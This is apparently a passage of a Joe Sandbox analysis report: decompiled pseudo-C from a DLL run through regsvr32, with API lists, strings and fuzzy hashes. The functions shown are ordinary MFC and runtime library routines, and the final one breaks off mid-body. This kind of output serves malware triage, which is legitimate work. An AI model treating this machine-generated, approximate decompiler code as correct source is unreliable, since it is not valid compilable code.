Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$EmptyWindow_malloc
String ID: @
API String ID: 299164714-2766056989
Opcode ID: 231956de7690e02c2dc6420e6d14d227eb916f6845a0a5c2140db660af6d1e05
Instruction ID: caa1d8ef8b3ff2674ffc05b96da04f017d462dea4e3151a0d893637e03f8ddd5
Opcode Fuzzy Hash: 231956de7690e02c2dc6420e6d14d227eb916f6845a0a5c2140db660af6d1e05
Instruction Fuzzy Hash: 88C1197190021AAFCF05CFA8C885AEEBBF5FF48355F11856DE856AB251DB34AA40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10017057 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E10017057(void* __ecx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t33;
				intOrPtr* _t35;
				intOrPtr* _t36;
				void* _t38;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr _t55;
				void* _t58;
				void* _t60;
				intOrPtr _t62;

				_t62 = E1001DD4F(_t54, _t58, _t60, __eflags) + 0x7c;
				_t55 =  *((intOrPtr*)(E1001E302(_t54, _t58, _t62, __eflags) + 8));
				if(_a8 != 0 || _a12 != 0) {
					L4:
					_v8 =  *((intOrPtr*)(E10049097(__eflags)));
					_t33 = E10049097(__eflags);
					_push(_a16);
					 *_t33 = 0;
					_push(_a12);
					_push(_a8);
					_push(_a4);
					E1004C1D3(_t62, 0x60, 0x5f, "Afx:%p:%x:%p:%p:%p", _t55);
					goto L5;
				} else {
					_t69 = _a16;
					if(_a16 != 0) {
						goto L4;
					}
					_v8 =  *((intOrPtr*)(E10049097(_t69)));
					_t52 = E10049097(_t69);
					_push(_a4);
					 *_t52 = 0;
					E1004C1D3(_t62, 0x60, 0x5f, "Afx:%p:%x", _t55);
					L5:
					_t35 = E10049097(_t69);
					_t70 =  *_t35;
					if( *_t35 == 0) {
						_t36 = E10049097(__eflags);
						_t57 = _v8;
						 *_t36 = _v8;
					} else {
						L1000AD19( *((intOrPtr*)(E10049097(_t70))));
						_pop(_t57);
					}
					_push( &_v48);
					_push(_t62);
					_push(_t55);
					_t38 = E1001242B(_t55, _t57, 0, _t62, _t70);
					_t71 = _t38;
					if(_t38 == 0) {
						_v48 = _a4;
						_v44 = DefWindowProcA;
						_v28 = _a16;
						_v24 = _a8;
						_v20 = _a12;
						_push( &_v48);
						_v36 = 0;
						_v40 = 0;
						_v32 = _t55;
						_v16 = 0;
						_v12 = _t62;
						if(L10016FC9(_t55, _t57, 0, _t62, _t71) == 0) {
							E1000C2E1(_t57);
						}
					}
					return _t62;
				}
			}

0x10017067
0x1001706f
0x10017077
0x100170ac
0x100170b3
0x100170b6
0x100170bb
0x100170be
0x100170c0
0x100170c3
0x100170c6
0x100170d4
0x00000000
0x1001707e
0x1001707e
0x10017081
0x00000000
0x00000000
0x1001708a
0x1001708d
0x10017092
0x10017095
0x100170a2
0x100170dc
0x100170dc
0x100170e1
0x100170e3
0x100170f4
0x100170f9
0x100170fc
0x100170e5
0x100170ec
0x100170f1
0x100170f1
0x10017101
0x10017102
0x10017103
0x10017104
0x1001710c
0x1001710e
0x10017113
0x1001711b
0x10017121
0x10017127
0x1001712d
0x10017133
0x10017134
0x10017137
0x1001713a
0x1001713d
0x10017140
0x1001714a
0x1001714c
0x1001714c
0x1001714a
0x10017157
0x10017157

APIs

__snprintf_s.LIBCMT ref: 100170A2

Part of subcall function 1004C1D3: __vsnprintf_s_l.LIBCMT ref: 1004C1E8

__snprintf_s.LIBCMT ref: 100170D4

Part of subcall function 10049097: __getptd_noexit.LIBCMT ref: 10049097

Strings

Afx:%p:%x:%p:%p:%p, xrefs: 100170CA
Afx:%p:%x, xrefs: 10017098

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: __snprintf_s$__getptd_noexit__vsnprintf_s_l
String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
API String ID: 3029210900-2801496823
Opcode ID: 3c6da9fbff05cd2ebeb11c550e62aa1aee221b428ba4dac0de3410c076cb883f
Instruction ID: cdf93d0280f2cea4f25f4823816fbdce5615ba8bd02a0b44cf6043f8a17af632
Opcode Fuzzy Hash: 3c6da9fbff05cd2ebeb11c550e62aa1aee221b428ba4dac0de3410c076cb883f
Instruction Fuzzy Hash: B131FAB9900309EFDB12DFA9CC4199E7BF4FF49250F214066F908AB212D735EA90DB65

Uniqueness

Uniqueness Score: -1.00%

Function 10025850 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E10025850(void* __ebx, long long* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t34;
				void* _t35;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t75;
				long long* _t76;

				_push(4);
				E1004764D(0x1008f979, __ebx, __edi, __esi);
				 *(_t75 - 0x10) =  *(_t75 - 0x10) & 0x00000000;
				_t34 =  *((intOrPtr*)(__ecx + 8));
				_t78 = _t34 - 2;
				if(_t34 != 2) {
					__eflags = _t34 - 1;
					if(_t34 != 1) {
						 *(_t75 - 0x10) =  *(_t75 - 0x10) & 0x00000000;
						_t35 = _t75 - 0x10;
						 *(_t75 - 4) = 1;
						 *_t76 =  *__ecx;
						__imp__#114(__ecx, __ecx,  *((intOrPtr*)(_t75 + 0x10)),  *((intOrPtr*)(_t75 + 0xc)), _t35);
						__eflags = _t35;
						if(__eflags >= 0) {
							_push( *(_t75 - 0x10));
							E1000B053(__ebx, _t75 + 0x10, __edi, __esi, __eflags);
							 *(_t75 - 4) = 3;
							L100010F5( *((intOrPtr*)(_t75 + 8)), __eflags, _t75 + 0x10);
							_t60 =  *((intOrPtr*)(_t75 + 0x10));
						} else {
							L1000140B(_t75 + 0xc, E100184C0());
							 *(_t75 - 4) = 2;
							__eflags = L10001276(_t75 + 0xc, 0xd800);
							_t64 =  *((intOrPtr*)(_t75 + 8));
							if(__eflags == 0) {
								_push("Invalid DateTime");
								E1000B543(__ebx, _t64, __edi, __esi, __eflags);
							} else {
								L100010F5(_t64, __eflags, _t75 + 0xc);
							}
							_t60 =  *((intOrPtr*)(_t75 + 0xc));
						}
						__eflags = _t60 + 0xfffffff0;
						L100013E3(_t60 + 0xfffffff0, 1);
						__imp__#6( *(_t75 - 0x10));
					} else {
						L1000140B(_t75 + 0xc, E100184C0());
						 *(_t75 - 4) =  *(_t75 - 4) & 0x00000000;
						__eflags = L10001276(_t75 + 0xc, 0xd800);
						_t67 =  *((intOrPtr*)(_t75 + 8));
						if(__eflags == 0) {
							_push("Invalid DateTime");
							E1000B543(__ebx, _t67, __edi, __esi, __eflags);
						} else {
							L100010F5(_t67, __eflags, _t75 + 0xc);
						}
						L100013E3( *((intOrPtr*)(_t75 + 0xc)) + 0xfffffff0, 1);
					}
				} else {
					_push(0x1009c448);
					E1000B543(__ebx,  *((intOrPtr*)(_t75 + 8)), __edi, __esi, _t78);
				}
				return E10047725( *((intOrPtr*)(_t75 + 8)));
			}

0x10025850
0x10025857
0x1002585c
0x10025860
0x10025863
0x10025866
0x1002587d
0x1002587f
0x100258cc
0x100258d2
0x100258d9
0x100258e1
0x100258e4
0x100258ea
0x100258ec
0x1002592e
0x10025934
0x10025940
0x10025944
0x10025949
0x100258ee
0x100258f7
0x10025904
0x1002590d
0x1002590f
0x10025912
0x10025922
0x10025927
0x10025914
0x10025918
0x10025918
0x1002591d
0x1002591d
0x1002594c
0x1002594f
0x10025957
0x10025881
0x1002588a
0x1002588f
0x100258a0
0x100258a2
0x100258a5
0x100258c0
0x100258c5
0x100258a7
0x100258ab
0x100258ab
0x100258b6
0x100258b6
0x10025868
0x1002586b
0x10025870
0x10025870
0x10025965

APIs

__EH_prolog3.LIBCMT ref: 10025857

Part of subcall function 1000B543: __EH_prolog3.LIBCMT ref: 1000B54A

Strings

Invalid DateTime, xrefs: 100258C0, 10025922

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prolog3
String ID: Invalid DateTime
API String ID: 431132790-2190634649
Opcode ID: 6f776fbd6c87e7c9310018bac5e60b9b7257e91b4a3c306342cbe11a70d55a04
Instruction ID: 067318ef8cb8f0eea395baab5e4922b740af21be137fd8082c09c2c459eaa513
Opcode Fuzzy Hash: 6f776fbd6c87e7c9310018bac5e60b9b7257e91b4a3c306342cbe11a70d55a04
Instruction Fuzzy Hash: D0318B3850014AEBEB04DFA4CC42BEE3769FF00395F50C519F92A96196DF71AB44CB25

Uniqueness

Uniqueness Score: -1.00%

Function 100461BC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100461BC(void* __ebx, void* __ecx, void* __esi, void* __eflags, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void* _v64;
				void* __edi;
				void* __ebp;
				signed int _t18;
				long _t23;
				void* _t30;
				void* _t33;
				void* _t34;
				void* _t35;

				_t35 = __esi;
				_t31 = __ecx;
				_t30 = __ebx;
				_t33 = __ecx;
				E10049170(__ecx,  &_v64, 0, 0x3c);
				_t18 = _a4;
				_v52 = 0x28;
				if(_t18 != 0) {
					_v64 =  *((intOrPtr*)(_t18 + 0x20));
				} else {
					_v64 = _v64 & _t18;
				}
				_v60 = _a8;
				_v56 = _a12;
				_t23 = SendMessageA( *(_t33 + 0x20), 0x40a, 0,  &_v64);
				_pop(_t34);
				if(_t23 == 0) {
					return 0;
				} else {
					_push(E10047757(_t30, _t31, _a16, 0x30,  &_v52, 0x28));
					L1000135C(_t30, _t31, _t34, _t35);
					return 1;
				}
			}

0x100461bc
0x100461bc
0x100461bc
0x100461cb
0x100461cd
0x100461d2
0x100461da
0x100461e1
0x100461eb
0x100461e3
0x100461e3
0x100461e3
0x100461f1
0x100461f7
0x10046208
0x10046210
0x10046211
0x00000000
0x10046213
0x10046223
0x10046224
0x00000000
0x1004622e

APIs

_memset.LIBCMT ref: 100461CD
SendMessageA.USER32 ref: 10046208
_memcpy_s.LIBCMT ref: 1004621E

Strings

(, xrefs: 100461DA

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend_memcpy_s_memset
String ID: (
API String ID: 2479521229-3887548279
Opcode ID: f770b82baededa0124a9ac80d62ad331fe20c876356ee748661109cb299e6378
Instruction ID: f95a88c069b750153419611af3e432d482e3ab38b6ba82756daf38a82866482c
Opcode Fuzzy Hash: f770b82baededa0124a9ac80d62ad331fe20c876356ee748661109cb299e6378
Instruction Fuzzy Hash: 32010875A40209BFEB50DFA4DD86F9E77F8EB08640F204425BE05E62A1EBB4E9108B55

Uniqueness

Uniqueness Score: -1.00%

Function 10015735 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E10015735(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* __esi;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t28;

				_t28 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E10021F6C(__ebx, _t25, __ebp, 0xc);
				_push(0x100147f3);
				_t26 = E10020524(__ebx, 0x100bdba8, __edi, _t25, _t28);
				_t29 = _t26;
				if(_t26 == 0) {
					E1000A069(_t21, 0x100bdba8, __edi, _t26, _t29);
				}
				_t30 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E10021FD9(0xc);
					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
				} else {
					_push("hhctrl.ocx");
					_t16 = E10012699(_t21, 0x100bdba8, _t24, _t26, _t30);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						__eflags = _t17;
						 *(_t26 + 8) = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}

0x10015735
0x10015735
0x10015735
0x10015738
0x1001573d
0x1001574c
0x1001574e
0x10015750
0x10015752
0x10015752
0x10015757
0x1001575b
0x10015795
0x10015797
0x00000000
0x1001575d
0x1001575d
0x10015762
0x1001576a
0x1001576d
0x10015779
0x1001577f
0x10015781
0x10015784
0x00000000
0x00000000
0x10015789
0x1001578f
0x1001578f
0x00000000
0x1001576f

APIs

Part of subcall function 10021F6C: EnterCriticalSection.KERNEL32(100BDE70,?,?,?,?,1002053F,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10021FA8
Part of subcall function 10021F6C: InitializeCriticalSection.KERNEL32(10006BB6,?,?,?,?,1002053F,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10021FB7
Part of subcall function 10021F6C: LeaveCriticalSection.KERNEL32(100BDE70,?,?,?,?,1002053F,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10021FC4
Part of subcall function 10021F6C: EnterCriticalSection.KERNEL32(10006BB6,?,?,?,?,1002053F,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10021FD0

Part of subcall function 10020524: __EH_prolog3_catch.LIBCMT ref: 1002052B

Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A

GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_000147F3,0000000C), ref: 10015779
FreeLibrary.KERNEL32(?), ref: 10015789

Strings

hhctrl.ocx, xrefs: 1001575D
HtmlHelpA, xrefs: 10015773

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 2853499158-63838506
Opcode ID: e728941f19ab12fa9c8826075ded7b4199ed8ede93d294f17925572643fa50ed
Instruction ID: 2fddd1d9b1a741332842403885cf4ffdfe71f473e0a6c8fe02c8f939fbf869cd
Opcode Fuzzy Hash: e728941f19ab12fa9c8826075ded7b4199ed8ede93d294f17925572643fa50ed
Instruction Fuzzy Hash: 0401D139008712DAD720DB60AE06B4A76D0EF00792F094828F5AA9D4E0EB31D8909A22

Uniqueness

Uniqueness Score: -1.00%

Function 10055EF1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E10055EF1() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x100a1cd0;
					_v28 =  *0x100a1cc8;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x10055ef6
0x10055efe
0x10055f15
0x10055ec1
0x10055eca
0x10055ed6
0x10055ed9
0x10055edc
0x10055ede
0x10055ee1
0x10055ee6
0x10055ef0
0x10055ee8
0x10055eec
0x10055eec
0x10055f00
0x10055f06
0x10055f0e
0x00000000
0x10055f10
0x10055f10
0x10055f14
0x10055f14
0x10055f0e

APIs

GetModuleHandleA.KERNEL32(KERNEL32,10048974), ref: 10055EF6
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 10055F06

Strings

IsProcessorFeaturePresent, xrefs: 10055F00
KERNEL32, xrefs: 10055EF1

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 903b33b06108be7c9a018411ec132b70dc1c98108062cdd628190353d40dd0e1
Instruction ID: a772b1b7cee335b2c17c27fa0fa3100e138ae637c69f3d7f302d0602ea8ce6ac
Opcode Fuzzy Hash: 903b33b06108be7c9a018411ec132b70dc1c98108062cdd628190353d40dd0e1
Instruction Fuzzy Hash: 2FF05430910D1DD2EF009BA5AE5E6EF7BB8FB40787F820590D691E0094DF318174D751

Uniqueness

Uniqueness Score: -1.00%

Function 10031021 Relevance: 6.3, APIs: 4, Instructions: 309
memoryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10031021(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16, char _a20, signed int _a44, signed int _a48, signed int _a52, intOrPtr _a56, signed int _a60, intOrPtr _a64, char _a68, intOrPtr _a92, signed int _a96, signed int _a100, intOrPtr _a104, signed int _a108, intOrPtr _a112, signed int _a116, char _a120) {
				signed int _v4;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				void* _v40;
				char _v124;
				char _v168;
				char _v176;
				char _v184;
				intOrPtr _v196;
				signed int* __ebp;
				signed int _t132;
				signed int _t138;
				signed int _t139;
				void* _t140;
				intOrPtr* _t145;
				intOrPtr* _t148;
				signed int _t149;
				signed int _t151;
				intOrPtr* _t152;
				void* _t154;
				intOrPtr* _t158;
				signed int _t163;
				intOrPtr _t164;
				intOrPtr* _t166;
				intOrPtr* _t168;
				void* _t179;
				intOrPtr _t182;
				signed int _t183;
				signed int _t185;
				signed int* _t186;
				void* _t187;
				intOrPtr* _t188;
				signed int _t202;
				signed int _t204;
				intOrPtr _t214;
				intOrPtr _t220;
				intOrPtr* _t222;
				intOrPtr _t223;
				signed int _t225;
				void* _t228;
				void* _t229;
				void* _t231;
				void* _t232;

				_t188 = __ecx;
				_t181 = __ebx;
				_t232 = _t231 - 0x74;
				_t225 =  &_v124;
				_t132 =  *0x100b9e70; // 0x6fb3f782
				_a116 = _t132 ^ _t225;
				_push(0x1c);
				E1004764D(0x10090734, __ebx, __edi, __esi);
				_t222 = __ecx;
				_v16 =  *((intOrPtr*)(__ecx + 0x14));
				_a4 =  *((intOrPtr*)(__ecx + 0x10));
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t138 =  *(__ecx + 8);
					__eflags = _t138;
					if(_t138 != 0) {
						_t215 =  &_a12;
						_t139 =  *((intOrPtr*)( *_t138 + 0xc))(_t138, 0x100a429c,  &_a12,  &_a8);
						__eflags = _t139;
						if(_t139 >= 0) {
							E1002D337( &_a12,  &_a20, 0x100a6910);
							_a52 = _a52 | 0xffffffff;
							_a44 = 0;
							_a48 = 0;
							_a56 = 0x18;
							_a60 = 0;
							_a64 = 0x1fb;
							E1002D337( &_a12,  &_a68, 0x100a6838);
							_t145 = _a12;
							_a100 = _a100 | 0xffffffff;
							_t215 =  &_a20;
							_a92 = 0x1c;
							_a96 = 0;
							_a104 = 0x20;
							_a108 = 0;
							_a112 = 0x1e;
							_t183 =  *((intOrPtr*)( *_t145 + 0x10))(_t145, 2,  &_a20, 0x28, 0);
							__eflags = _t183;
							if(_t183 >= 0) {
								_t215 = 0;
								_v40 = _a8;
								_t148 = _a12;
								_v36 = 1;
								_v32 = 0;
								_v28 = 0;
								_v24 = 0;
								_t149 =  *((intOrPtr*)( *_t148 + 0x18))(_t148, 0, 0,  &_v40);
								__eflags = _t149;
								 *_t225 = _t149;
								if(_t149 >= 0) {
									 *((intOrPtr*)(_t222 + 0x14)) = _v32;
									_t151 = _v20;
									_a8 = _t151;
									 *(_t222 + 0x10) = _t151;
									_t152 = _a12;
									 *((intOrPtr*)(_t222 + 0x34)) = _v28;
									 *((intOrPtr*)( *_t152 + 8))(_t152);
									goto L32;
								} else {
									_t166 = _a12;
									 *((intOrPtr*)( *_t166 + 8))(_t166);
								}
								goto L50;
							} else {
								_t168 = _a12;
								 *((intOrPtr*)( *_t168 + 8))(_t168);
								_t139 = _t183;
							}
						}
					} else {
						_t139 = 0;
					}
					goto L51;
				} else {
					__eax =  *(__esi + 0x4c);
					__ecx =  *__eax;
					__edx =  &_a16;
					__eax =  *((intOrPtr*)(__ecx + 0x14))(__eax, 0x100a616c, __edx);
					__eflags = __eax;
					 *__ebp = __eax;
					if(__eax < 0) {
						L51:
						 *[fs:0x0] = _v12;
						_pop(_t220);
						_pop(_t223);
						_pop(_t182);
						_t140 = E1004763E(_t139, _t182, _a116 ^ _t225, _t215, _t220, _t223);
						__eflags =  &_a120;
						return _t140;
					} else {
						__eax = _a16;
						__ecx =  *__eax;
						__edx =  &_a8;
						_push( &_a8);
						_push(0x100a611c);
						_push(__eax);
						__eflags = __eax;
						if(__eflags >= 0) {
							__eax = _a8;
							__edx =  &_a12;
							_push( &_a12);
							_push(0x100a628c);
							_a12 = 0;
							__ecx =  *__eax;
							_push(__eax);
							__eflags = __eax;
							if(__eflags >= 0) {
								__eax = _a12;
								__ecx =  *__eax;
								__edx = __esi + 0x58;
								__edx =  *(__esi + 4);
								__edx =  *(__esi + 4) + 0xe8;
								__eflags = __edx;
								__eax =  *((intOrPtr*)( *__eax + 0x14))(__eax, __edx, __esi + 0x58);
								__eax = _a12;
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
							}
							__eax = _a8;
							__ecx =  *__eax;
							__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						}
						__eax = E10009F14(__eflags, 0x14);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = L10030855(__eax, _a16);
						}
						 *(__esi + 0x50) = __eax;
						__eax = _a16;
						__ecx =  *__eax;
						__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						__eax =  *(__esi + 0x50);
						__ecx =  *__eax;
						__eflags =  *__eax - __edi;
						if(__eflags != 0) {
							__eflags = __eax;
							__eax = E1002D6F5(__ecx, __eax);
						}
						__eax = E10009F14(__eflags, 0x28);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E1002C138(__eax, __edi, 0x1f40);
						}
						__edx =  *(__esi + 0x50);
						 *(__esi + 0x54) = __eax;
